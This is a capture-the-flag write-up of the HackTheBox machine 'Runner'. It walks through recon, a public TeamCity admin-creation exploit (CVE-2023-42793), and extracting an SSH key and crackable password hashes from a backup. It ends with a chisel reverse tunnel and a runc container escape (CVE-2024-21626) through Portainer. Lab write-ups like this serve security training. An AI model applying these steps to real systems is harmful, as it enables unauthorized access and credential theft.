Hackthebox: Runner

Overview

Runner is a medium-difficulty machine from HackTheBox, where we first begin by exploiting TeamCity to obtain ssh credentials and our user flag, later port forwarding an internal Portainer application where we can abuse CVE-2024-21626 to do a docker escape and catch our root flag.

Reconnaissance

Nmap

PS C:\Users\0xkujen\OneDrive\Bureau\HackThebox\HTB_Machines\Runner> nmap -A -Pn 10.129.202.190
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-23 21:09 W. Central Africa Standard Time
NSOCK ERROR [0.2660s] ssl_init_helper(): OpenSSL legacy provider failed to load.

Nmap scan report for 10.129.202.190
Host is up (0.29s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
|_  256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
80/tcp   open  http        nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://runner.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
8000/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=8/23%OT=22%CT=1%CU=35190%PV=Y%DS=2%DC=T%G=Y%TM=66C8ECF
OS:C%P=i686-pc-windows-windows)SEQ(SP=102%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A
OS:)SEQ(CI=Z%II=I)SEQ(CI=Z%II=I%TS=A)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M
OS:54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=FE8
OS:8%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%
OS:CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y
OS:%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%R
OS:D=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%
OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPC
OS:K=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 53/tcp)
HOP RTT       ADDRESS
1   976.00 ms 10.10.16.1
2   174.00 ms 10.129.202.190

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.53 seconds

We can see that we have OpenSSH running on port 22, a web application exposed on port 80 and an exposed 8000 port.

Web Application - http://10.129.202.190

When navigating to http://10.129.202.190, we find that it’s redirecting us to runner.htb domain. So we go ahead and add that entry to our /etc/hosts file.

This seems like a casual web application without any actual features.

Subdomain Enumeration

PS C:\Users\0xkujen\Tools\ffuf> .\ffuf.exe -w ..\SecLists\Discovery\DNS\bitquark-subdomains-top100000.txt -H "Host: FUZZ.runner.htb" -u "http://10.129.202.190" -fs 154

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.202.190
 :: Wordlist         : FUZZ: C:\Users\0xkujen\Tools\SecLists\Discovery\DNS\bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.runner.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 154
________________________________________________

teamcity                [Status: 401, Size: 66, Words: 8, Lines: 2, Duration: 743ms]rors: 0 ::

We can see that we have a teamcity subdomain, we go ahead and add that to our /etc/hosts file and check what has for us.

TeamCity is a Continuous Integration and Deployment server that provides out-of-the-box continuous unit testing, code quality analysis, and early reporting on build problems.

CVE-2023-42793

Checking the TeamCity version Version 2023.05.3, we can find a public Remote Code Execution exploit here
It will create an admin account for us to login with:

PS C:\Users\0xkujen\OneDrive\Bureau\HackThebox\HTB_Machines\Runner> python3 .\TEAMCITY_EXPLOIT.py -u http://teamcity.runner.htb

=====================================================
*       CVE-2023-42793                              *
*  TeamCity Admin Account Creation                  *
*                                                   *
*  Author: ByteHunter                               *
=====================================================

Token: eyJ0eXAiOiAiVENWMiJ9.NTd0QktXa0JHTmpUVEgwcXptUUc3RzBTdl9v.MDVhNjVkNDAtZTVjNi00NzYzLThjYTYtYTVjNTExNDVkYzU1
Successfully exploited!
URL: http://teamcity.runner.htb
Username: city_adminBkh8
Password: Main_password!!**

We use those credentials and we are in!

We head to the Administration panel where we have a backup option, we don’t find any recent backups but we can create our own.

Checking the backup, we find an intersting id_rsa file under \config\projects\AllProjects\pluginData\ssh_keys but we don’t have a user for it.

Checking a users file I found inside the dump, I get some usernames:

PS C:\Users\0xkujen> cat .\database_dump\users
ID, USERNAME, PASSWORD, NAME, EMAIL, LAST_LOGIN_TIMESTAMP, ALGORITHM
1, admin, $2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye, John, [email protected], 1724498446610, BCRYPT
2, matthew, $2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em, Matthew, [email protected], 1709150421438, BCRYPT
11, city_adminx5ny, $2a$07$C9n55BiJLp3MuWZE3npKKuM1nEWDcTshJ9m27ZhrD/ECrrQ0w6DX2, , angry-admin@funnybunny.org, , BCRYPT
12, city_adminbkh8, $2a$07$a78P6w8OuQei.ZPEg/Hpru9dy/JFvFT5ghpaYpzDqtsq0P01XmVSq, , angry-admin@funnybunny.org, 1724510336022, BCRYPT
PS C:\Users\0xkujen>

Cracking these hashes, we can obtain Matthew‘s password piper123, but isn’t useful for ssh connection

Trying different usernames with the ssh private key, we get a hit for john along with our user flag:

kujen@kujen:~$ chmod 600 id_rsa
kujen@kujen:~$ ssh [email protected] -i id_rsa
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-102-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

  System information as of Sat Aug 24 03:07:16 PM UTC 2024

  System load:                      0.46044921875
  Usage of /:                       81.1% of 9.74GB
  Memory usage:                     37%
  Swap usage:                       0%
  Processes:                        224
  Users logged in:                  0
  IPv4 address for br-21746deff6ac: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.129.202.190
  IPv6 address for eth0:            dead:beef::250:56ff:feb0:18e1


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

john@runner:~$ cat user.txt
b1fc7c92faff67******************
john@runner:~$

Privilege Escalation

Checking for connections we can find something running on port 9000:

john@runner:~$ netstat -anot
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:5005          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:9443          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:8111          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      1 10.129.202.190:32934    1.1.1.1:53              SYN_SENT    on (2.55/2/0)
tcp        0    172 10.129.202.190:22       10.10.x.x:55578       ESTABLISHED on (0.11/0/0)
tcp6       0      0 :::80                   :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 :::22                   :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 :::8000                 :::*                    LISTEN      off (0.00/0/0)
john@runner:~$

We use chisel to portforward this application and access it from our own system:

Victim

john@runner:/tmp$ ./chisel client 10.10.x.x:4444 R:9000:127.0.0.1:9000
2024/08/24 15:38:31 client: Connecting to ws://10.10.x.x:4444
2024/08/24 15:38:34 client: Connected (Latency 125.385219ms)

Attacker

┌──(kali㉿kali)-[~/Downloads]
└─$ ./chisel server -port 4444 -reverse
2024/08/24 11:35:55 server: Reverse tunnelling enabled
2024/08/24 11:35:55 server: Fingerprint N+9a9kFpTk0bIn+Wf9CDdhRm/8rCxgrwEcQk4UxhADo=
2024/08/24 11:35:55 server: Listening on http://0.0.0.0:4444
2024/08/24 11:35:58 server: session#1: tun: proxy#R:9000=>9000: Listening

We open http://127.0.0.1:9000 and we are prompted with Portainer

Portainer is your container management software to deploy, troubleshoot, and secure applications across cloud, datacenter, and Industrial IoT use cases.

We can use Matthew credentials to login:

By checking portainer we can see that we have a couple of docker images:

We want to abuse the ubuntu:latest image in order to somehow gain some shell access.

After doing some research I stumbled onto this article about CVE-2024-21626 . Therefore I have to create a container built on the ubuntu:latest image with a working directory of /proc/self/fd/8.

And after creating the container, I used the container console to access the container as root, where I can find my root flag. By moving up several directories, I’m able to access files from the host:

And that was it for this writeup! Thanks for reading!
-0xkujen